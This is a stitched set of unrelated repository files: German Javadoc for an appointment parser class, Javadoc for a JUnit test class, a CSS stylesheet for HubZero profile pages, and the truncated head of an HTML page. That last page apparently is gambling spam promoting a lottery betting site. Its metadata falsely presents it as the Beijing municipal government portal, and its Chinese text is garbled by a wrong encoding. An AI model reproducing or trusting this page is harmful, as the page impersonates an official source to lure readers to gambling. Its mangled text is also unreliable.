<A NAME="parse(java.lang.String)"><!-- --></A><H3>
parse</H3>
<PRE>
public static void <B>parse</B>(java.lang.String string)</PRE>
<DL>
<DD>Diese Methode wertet die Daten aus dem Internet aus.
Der Algorithmus dazu ist relativ einfach und funktioniert
folgenermassen:<br>
Der String wird zuerst nach Zeilenumbruechen abgesucht. Wird
einer gefunden, wird Zeile von den restlichen Daten abgesplittet.
In ihr befinden sich nun die Informationen fuer exakt einen Termin.
Diese Zeile wird nun wiederrum der Reihe nach nach Doppelpunkten
abgesucht. Vor jedem dieser Doppelpunkte befindet sich eine
Termininformation. Diese werden nun der Reihe nach an das zuvor
erzeugte Objekt "Termin" uebergeben. Ist die Terminzeile dann
vollstaendig ausgewertet, kann der "gefuellte" Termin dem
Terminvektor hinzugefuegt werden und die naechste Terminzeile
wird interpretiert.
Dieser Vorgang geschieht so lange, bis sich im urspruenglichen
Daten-String keine Daten mehr befinden -> alles ist fertig
ausgewertet.<br>
Dieser Algorithmus hat den extremen Nachteil, dass durch die vielen
Stringoperationen sehr viel Speicher benoetigt wird, da ein
String nicht veraenderbar ist, bei jeder "Pseudo-Veraenderung"
eins Strings also nur eine Kopie des urspruenglichen angefertigt
wird.
Normalerweise haette man diesen Algorithmus auf eine sehr viel
einfachere Art mit der Klasse StringTokenizer/der Methode String.split()
realisiert, diese ist jedoch (leider) nicht Bestandteil des MID-Profiles.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>string</CODE> - Enthaelt die aus dem Internet geladenen Daten</DL>
</DD>
</DL>
<HR>
<A NAME="parseUpdates(java.lang.String)"><!-- --></A><H3>
parseUpdates</H3>
<PRE>
public static int <B>parseUpdates</B>(java.lang.String string)</PRE>
<DL>
<DD>Hier gilt dasselbe wie fuer parse(String string), jedoch mit dem
Unterschied, dass der ausgewertete Termin einen Termin im Vektor
uebschreibt, sofern sich diese in einigen Punkten unterscheiden.
Die Anzahl der aktualisierten Termine wird dabei mitgezaehlt und
am Schluss zurueckgegeben.
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>string</CODE> - Die aus dem Internet geladenen Update-Informationen
<DT><B>Returns:</B><DD>Anzahl der aktualisierten Termine<DT><B>See Also:</B><DD><A HREF="../../../com/johbrak/klautor/Parser.html#parse(java.lang.String)"><CODE>parse(String string)</CODE></A></DL>
</DD>
</DL>
<HR>
<A NAME="deparse()"><!-- --></A><H3>
deparse</H3>
<PRE>
public static java.lang.String <B>deparse</B>()</PRE>
<DL>
<DD>Macht aus dem Termine-Vektor eine Termine-Datei (bzw. String),
welcher bequem im persisten Speicher des Mobiltelephons abgelegt
werden kann.
<P>
<DD><DL>
<DT><B>Returns:</B><DD>Informationen ueber alle Termine in einem String</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_bottom"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/Parser.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../com/johbrak/klautor/ParseManager.html"><B>PREV CLASS</B></A>
<A HREF="../../../com/johbrak/klautor/PrefsMenu.html"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="Parser.html" TARGET="_top"><B>NO FRAMES</B></A>
<SCRIPT>
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html" TARGET=""><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html" TARGET=""><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
</BODY>
</HTML>
|
doc/structure/RepositoryTest.html | ZiXian92/MyGitHubIssueTracker | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_25) on Sat Jan 03 21:44:58 SGT 2015 -->
<title>RepositoryTest</title>
<meta name="date" content="2015-01-03">
<link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style">
<script type="text/javascript" src="../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="RepositoryTest";
}
}
catch(err) {
}
//-->
var methods = {"i0":10,"i1":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/RepositoryTest.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../structure/Repository.html" title="class in structure"><span class="typeNameLink">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../index.html?structure/RepositoryTest.html" target="_top">Frames</a></li>
<li><a href="RepositoryTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">structure</div>
<h2 title="Class RepositoryTest" class="title">Class RepositoryTest</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>structure.RepositoryTest</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="typeNameLabel">RepositoryTest</span>
extends java.lang.Object</pre>
<div class="block">JUnit test for Repository.</div>
<dl>
<dt><span class="simpleTagLabel">Author:</span></dt>
<dd>ZiXian92</dd>
</dl>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../structure/RepositoryTest.html#RepositoryTest--">RepositoryTest</a></span>()</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../structure/RepositoryTest.html#testMakeInstance--">testMakeInstance</a></span>()</code> </td>
</tr>
<tr id="i1" class="rowColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../structure/RepositoryTest.html#testReplaceIssue--">testReplaceIssue</a></span>()</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="RepositoryTest--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>RepositoryTest</h4>
<pre>public RepositoryTest()</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="testMakeInstance--">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>testMakeInstance</h4>
<pre>public void testMakeInstance()
throws java.io.FileNotFoundException,
org.json.JSONException</pre>
<dl>
<dt><span class="throwsLabel">Throws:</span></dt>
<dd><code>java.io.FileNotFoundException</code></dd>
<dd><code>org.json.JSONException</code></dd>
</dl>
</li>
</ul>
<a name="testReplaceIssue--">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>testReplaceIssue</h4>
<pre>public void testReplaceIssue()</pre>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/RepositoryTest.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../deprecated-list.html">Deprecated</a></li>
<li><a href="../index-files/index-1.html">Index</a></li>
<li><a href="../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../structure/Repository.html" title="class in structure"><span class="typeNameLink">Prev Class</span></a></li>
<li>Next Class</li>
</ul>
<ul class="navList">
<li><a href="../index.html?structure/RepositoryTest.html" target="_top">Frames</a></li>
<li><a href="RepositoryTest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
core/plugins/members/profile/assets/css/profile.css | hubzero/hubzero-cms | /**
* @package hubzero-cms
* @copyright Copyright (c) 2005-2020 The Regents of the University of California.
* @license http://opensource.org/licenses/MIT MIT
*/
.member_profile {
margin: 0;
padding: 0;
}
#profile {
margin: 0;
padding: 0;
list-style: none;
border-bottom: 1px solid #efefef;
}
#profile li.section {
overflow: hidden;
margin: 0;
padding: 10px;
border-top: 1px solid #efefef;
position: relative;
}
#profile li .section-hover {
background: #FF0;
width: 100%;
height: 100%;
position: absolute;
top: 0;
left: 0;
z-index: 777;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=10)";
filter: alpha(opacity=10);
opacity: 0.1;
cursor: pointer;
}
#profile li .section-content {
width: 95%;
float: left;
}
#profile li .section-content .key {
float: left;
position: relative;
width: 20%;
margin: 0 2% 0 3%;
padding: 0;
font-weight: bold;
color: #777;
}
#profile li .section-content .value {
float: left;
width: 75%;
color: #222;
}
#profile li .section-edit {
float: left;
width: 5%;
text-align: right;
}
#profile li .section-edit a {
font-size: 11px;
color: #ccc;
text-transform: uppercase;
position: relative;
z-index: 888;
display: none;
}
#profile li:hover .section-edit a {
color: #000;
}
#profile li .section-edit a.open {
font-size: 18px;
font-weight: bold;
}
#profile li .section-edit a.open:hover {
border: none;
}
#profile .section-edit-container {
display: none;
}
#profile .section-edit-content {
padding: 10px;
margin: 20px 0 10px 25%;
background: #FFF;
border: 1px solid #CCC;
overflow: hidden;
}
#profile .section-edit-container .notice {
margin: 10px 0 10px 25%;
}
#profile .section-edit-content .input-wrap {
border-bottom: 1px solid #efefef;
margin-bottom: 1em;
padding: 0 0 1em 0;
}
#profile .section-edit-content label {
font-weight: bold;
display: block;
padding-bottom: 10px;
}
#profile .section-edit-content label.side-by-side {
float:left;
width:49%;
padding-right: 2%;
}
#profile .section-edit-content .block {
display: block;
margin-top: 1em;
clear: both;
}
#profile .section-edit-content .block label {
display: block;
padding-top: 1em;
border-top: 1px solid #efefef;
}
#profile .section-edit-content div.side-by-side {
float:left;
width:48%;
padding-right: 2%;
}
#profile .section-edit-content .side-by-side label {
display: inline;
margin: 0.5em 0 0 0;
border-bottom: none;
}
#profile .section-edit-content label.three {
width: 32%;
padding-right: 2%;
}
#profile .section-edit-content label.no-padding-right {
padding-right: 0;
}
#profile .section-edit-content .input-wrap input[type=password],
#profile .section-edit-content .input-wrap input[type=text],
#profile .section-edit-content .input-wrap select,
#profile .section-edit-content .input-wrap textarea {
display: block;
width: 100%;
}
.section-edit-submit:disabled {
background: #81adfc;
border: 1px solid #6389d0;
color: #ccc;
}
#profile .section-edit-content .no-margin-top {
margin-top: 0;
}
#profile .section-edit-content .sub {
}
#profile .section-edit-content .sub label {
margin: 0 0 5px 0;
padding: 0;
font-weight: normal;
border: none;
}
#profile .section-edit-content .sub-sub,
#profile .section-edit-content label.indent {
margin: 0 0 10px 20px;
}
#profile .section-edit-content .hint {
color: #999;
font-size: 90%;
font-weight: normal;
}
#profile .section-edit-content .token-input-list-act li p {
font-weight: normal;
}
/* Overlay */
.edit-profile-overlay.update {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: #FFF;
z-index: 88888;
position: absolute;
background: #FFF url("../img/updating.gif") no-repeat 50% 50%;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=70)";
filter: alpha(opacity=70);
opacity:0.7;
}
/* Active Section */
#profile li.section.active {
background: #efefef;
}
/* Hidden Section */
#profile li.section.hidden {
}
#profile li.section.hidden .key {
color: rgba(0,0,0,0.3);
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=40)";
filter: alpha(opacity=40);
}
#profile li.section.hidden .value {
color: rgba(0,0,0,0.3);
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=40)";
filter: alpha(opacity=40);
}
#profile li.section.hidden .key:before {
content: "\f070";
position: absolute;
left: -20px;
top: 0px;
width: 18px;
height: 18px;
font-size: 14px;
font-family: 'Fontcons';
color: #b2b2b2;
}
/* Private Section */
#profile li.section.private {
background-color: #efefef;
background-image: -webkit-gradient(linear, 0 0, 100% 100%,
color-stop(.25, rgba(255, 255, 255, .065)), color-stop(.25, transparent),
color-stop(.5, transparent), color-stop(.5, rgba(255, 255, 255, .065)),
color-stop(.75, rgba(255, 255, 255, .065)), color-stop(.75, transparent),
to(transparent));
background-image: -webkit-linear-gradient(-45deg, rgba(255, 255, 255, .065) 25%, transparent 25%,
transparent 50%, rgba(255, 255, 255, .065) 50%, rgba(255, 255, 255, .065) 75%,
transparent 75%, transparent);
background-image: -moz-linear-gradient(-45deg, rgba(255, 255, 255, .065) 25%, transparent 25%,
transparent 50%, rgba(255, 255, 255, .065) 50%, rgba(255, 255, 255, .065) 75%,
transparent 75%, transparent);
background-image: -ms-linear-gradient(-45deg, rgba(255, 255, 255, .065) 25%, transparent 25%,
transparent 50%, rgba(255, 255, 255, .065) 50%, rgba(255, 255, 255, .065) 75%,
transparent 75%, transparent);
background-image: -o-linear-gradient(-45deg, rgba(255, 255, 255, .065) 25%, transparent 25%,
transparent 50%, rgba(255, 255, 255, .065) 50%, rgba(255, 255, 255, .065) 75%,
transparent 75%, transparent);
background-image: linear-gradient(-45deg, rgba(255, 255, 255, .065) 25%, transparent 25%,
transparent 50%, rgba(255, 255, 255, .065) 50%, rgba(255, 255, 255, .065) 75%,
transparent 75%, transparent);
-webkit-background-size: 30px 30px;
-moz-background-size: 30px 30px;
background-size: 30px 30px;
}
#profile li.section.private .key {
}
#profile li.section.private .key:before {
content: "\f023";
position: absolute;
left: -20px;
top: 0px;
width: 18px;
height: 18px;
font-size: 14px;
font-family: 'Fontcons';
color: #999999;
}
/* Profile Bio Section */
#profile li.profile-bio p:first-child {
margin-top:0;
}
#profile_bio {
width:99%;
}
#profile .section-edit-content .input-wrap ul {
list-style: none;
margin: 0;
}
#profile .section-edit-content .input-wrap li {
margin: 0;
padding: 0.2em 0;
}
#profile .section-edit-content .input-wrap li label,
#profile .section-edit-content .input-wrap li input[type=radio],
#profile .section-edit-content .input-wrap li input[type=checkbox] {
width: auto;
display: inline-block;
margin-right: 0.5em;
}
#profile .section-edit-content label {
position: relative;
}
#profile .section-edit-content .input-wrap li label {
font-weight: normal;
}
#profile .section-edit-content span.required {
color: #c00;
font-weight: normal;
font-size: 0.85em;
text-transform: uppercase;
letter-spacing: 1px;
position: absolute;
right: 0;
}
/* Member Profile Completeness */
#page_options #member-profile-completeness {
position:relative;
width:200px;
border:none;
font-size:9px;
line-height:8px;
font-weight:bold;
text-transform:uppercase;
color:#777;
text-align: left;
}
#member-profile-completeness #meter {
margin:3px 0 0 0;
background:#bbb;
background-image: -webkit-linear-gradient(top, #bbb, #eee);
background-image: -moz-linear-gradient(top, #bbb, #eee);
background-image: -o-linear-gradient(top, #bbb, #eee);
background-image: -ms-linear-gradient(top, #bbb, #eee);
background-image: linear-gradient(top, #bbb, #eee);
border-radius:3px;
}
#member-profile-completeness #meter-percent {
display:block;
height:8px;
border-top:1px solid #70b2f4;
background:#439bf4;
background-image: -webkit-linear-gradient(top, #439bf4, #2074cb);
background-image: -moz-linear-gradient(top, #439bf4, #2074cb);
background-image: -o-linear-gradient(top, #439bf4, #2074cb);
background-image: -ms-linear-gradient(top, #439bf4, #2074cb);
background-image: linear-gradient(top, #439bf4, #2074cb);
-webkit-transition: all 0.5s linear;
-moz-transition: all 0.5s linear;
-o-transition: all 0.5s linear;
-ms-transition: all 0.5s linear;
transition: all 0.5s linear;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=70)";
filter: alpha(opacity=70);
opacity:0.7;
border-radius:3px;
width: 0%;
}
#member-profile-completeness #meter-percent:after {
content:attr(data-percent) '%';
position:absolute;
top:0;
right:0;
color:#444;
}
#member-profile-completeness #completeness-info {
display:block;
text-align:right;
padding:3px 0 0 0;
font-weight:normal;
text-transform:lowercase;
color:#aaa;
}
#member-profile-completeness #completeness-info:hover {
cursor:pointer;
color:#444;
}
/* Member Picture Upload */
#ajax-upload-container {
background: #fff;
padding: 20px;
}
#ajax-upload-container h2 {
margin: 0 0 30px 0;
line-height: 1em;
}
#ajax-upload-left {
text-align: center;
}
#ajax-upload-left img {
border-radius: 3px;
box-shadow: 0 0 2px black;
max-width: 100%;
max-height: 300px;
}
#ajax-upload-left #remove-picture {
display: inline-block;
color: #444;
}
.qq-uploading {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 107px;
color: #fff;
font-size: 18px;
padding: 75px 0 0 0;
text-align: center;
background: rgba(0,0,0,0.75);
}
.qq-uploader {
position: relative;
margin: 0;
padding: 0;
}
/* Drop areas */
.qq-upload-button,
.qq-upload-drop-area {
background: #f7f7f7;
border: 2px dashed #ddd;
text-align: center;
color: #bbb;
padding: 0;
font-size: 1.5em;
}
.qq-upload-button,
.qq-upload-drop-area {
text-align: center;
padding: 60px 0;
}
.qq-upload-button span,
.qq-upload-drop-area span {
position: relative;
display: block;
padding-top: 2em;
}
.qq-upload-button span:before,
.qq-upload-drop-area span:before {
display: block;
position: absolute;
top: 0;
font-family: "Fontcons";
font-size: 1.5em;
line-height: 1;
content: "\f03e";
left: 50%;
margin-left: -0.5em;
}
.qq-upload-button:hover,
.qq-upload-drop-area:hover,
.qq-upload-drop-area-active {
border: 2px solid #333;
color: #333;
cursor: pointer;
}
.qq-upload-drop-area {
position: absolute;
top: 0;
left: 0;
right: 0;
}
#ajax-upload-right .qq-upload-list {
display:none;
}
#ajax-upload-right table {
border:none;
}
#ajax-upload-right table tr td {
border-bottom:1px solid #ccc;
}
#ajax-upload-right table tr:last-child td {
border:none;
}
#ajax-upload-right table tr td.key {
font-weight:bold;
color:#333;
text-align:right;
width:20%;
}
/* */
#ajax-upload-uploading {
background: #000;
background: rgba(0,0,0,0.7);
position: absolute;
top: 0px;
left: 0px;
height: 100%;
width: 100%;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=70)";
filter: alpha(opacity=70);
}
#ajax-upload-uploading:before {
position: absolute;
top: 50px;
left: 0;
width: 100%;
height: 24px;
text-align: center;
font-size: 20px;
color:#FFF;
content: "Uploading...";
}
#page_identity a#page_identity_change {
position: absolute;
bottom: 0;
left: 0;
background: #000;
background: rgba(0,0,0,0.7);
color: #FFF;
z-index: 555;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=70)";
filter: alpha(opacity=70);
display: block;
border: none;
padding: 1em 0;
min-height: 1em;
font-weight:500;
font-size: 1.2em;
}
#page_identity_change span:before {
content: "\f03e";
font-family: 'Fontcons';
margin-right: 0.4em;
}
#page_identity a#page_identity_change:hover {
background:#000;
-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";
filter: alpha(opacity=100);
background:rgba(0,0,0,1);
}
#page_identity a#page_identity_change:hover span {
color:#FFF;
}
/* Member Picture Upload */
#usage-agreement-popup {
background:#FFF;
padding:20px;
}
#usage-agreement-popup h2 {
margin:0 0 10px 0;
line-height:1em;
}
#usage-agreement-box {
border:1px solid #ccc;
padding:20px;
}
#usage-agreement {
width:100%;
height:300px;
overflow-y:scroll;
}
#usage-agreement-buttons {
text-align:center;
margin:10px 0 0 0;
overflow:hidden;
}
#usage-agreement-last-chance {
display:none;
background:#ffefef;
}
#usage-agreement-last-chance h3 {
margin:0 0 10px 0;
}
#usage-agreement-last-chance-buttons {
display:none;
margin:10px 0 0 0;
overflow:hidden;
}
.usage-agreement-back-to-agree {
float:left;
font-size:13px;
background:#065EFF;
color:#FFF;
border:1px solid #0441B0;
}
.usage-agreement-dont-accept {
background:#F00;
float:right;
color:#FFF;
font-size:13px;
border:1px solid #8b0101;
}
/* Members Incremental */
#award-info {
display: none;
background: #fdf6ba;
padding: 1em 1.5em;
border: 2px solid #ffba00;
margin-bottom: 1em;
}
#award-info strong:before {
content: "\f006";
font-family: "Fontcons";
margin-right: 0.1em;
font-size: 1.2em;
border: none;
color: orange;
}
#wallet {
position: fixed;
bottom: 1em;
right: 1em;
padding-left: 65px;
border: 2px solid #ffba00;
width: 100px;
font-size: large;
height: 40px;
font-weight: bold;
display: none;
}
#wallet span:before {
content: "\f006";
font-family: "Fontcons";
margin-right: 0.1em;
font-size: 1.2em;
border: none;
color: orange;
}
#orcid-fetch {
margin-top: 1.65em;
}
#profile .address-field-wrap {
position: relative;
padding: 0 0 1em 0;
margin: 0 0 1em 0;
border-bottom: 1px solid #eee;
}
#profile .address-add {
text-align: center;
}
#profile .address-remove {
position: absolute;
top: 0;
right: 0;
}
/* Member Address */
.member-address-form fieldset p {
margin: 0;
padding: 1em;
}
.icon-locate:before {
content: "\f041";
}
.section .address-links {
display: none;
}
.section.active .address-links {
display: block;
}
.profile-address .grid {
padding: 20px 0 0 0;
margin: 20px 0 0 0;
border-top: 1px solid #efefef;
}
.profile-address .grid:first-child {
margin: 0;
padding: 0;
border-top: none;
} |
logs/meng/q38347.html | ForAEdesWeb/AEW25 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="descRiption" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®»¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨" />
<title>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®_±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®-dld158ÓéÀÖ{°Ù¶ÈÐÂÎÅ}°Ù¶ÈÈÏÖ¤</title>
<!--ÈÈÁ¦Í¼¿ªÊ¼-->
<meta name="uctk" content="enabled">
<!--ÈÈÁ¦Í¼½áÊø-->
<meta name="keywords" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®"/>
<meta name="descRiption" content="»¶Ó´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨"/>
<meta name="sitename" content="Ê×¶¼Ö®´°-±±¾©ÊÐÕþÎñÃÅ»§ÍøÕ¾">
<meta name="siteurl" content="http://www.beijing.gov.cn">
<meta name="district" content="±±¾©" >
<meta name="filetype" content="0">
<meta name="publishedtype" content="1">
<meta name="pagetype" content="2">
<meta name="subject" content="28428;1">
<!-- Le styles -->
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap150609.css" rel="stylesheet">
<link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap-responsive150609.css" rel="stylesheet">
<style>
body {
background:#E8E8E8; /* 60px to make the container go all the way to the bottom of the topbar */
}
.navbar .btn-navbar { position:absolute; right:0; margin-top:50px;}
#othermessage p {width:50%;}
#othermessage dl { width:50%;}
#breadcrumbnav ul { width:100%;}
#breadcrumbnav ul li { line-height:14px; font-family:"ËÎÌå"; padding:0px 10px; margin:0; background:none; }
#othermessage span { padding:0px 10px;}
#footer { margin:20px -20px 0px -20px;}
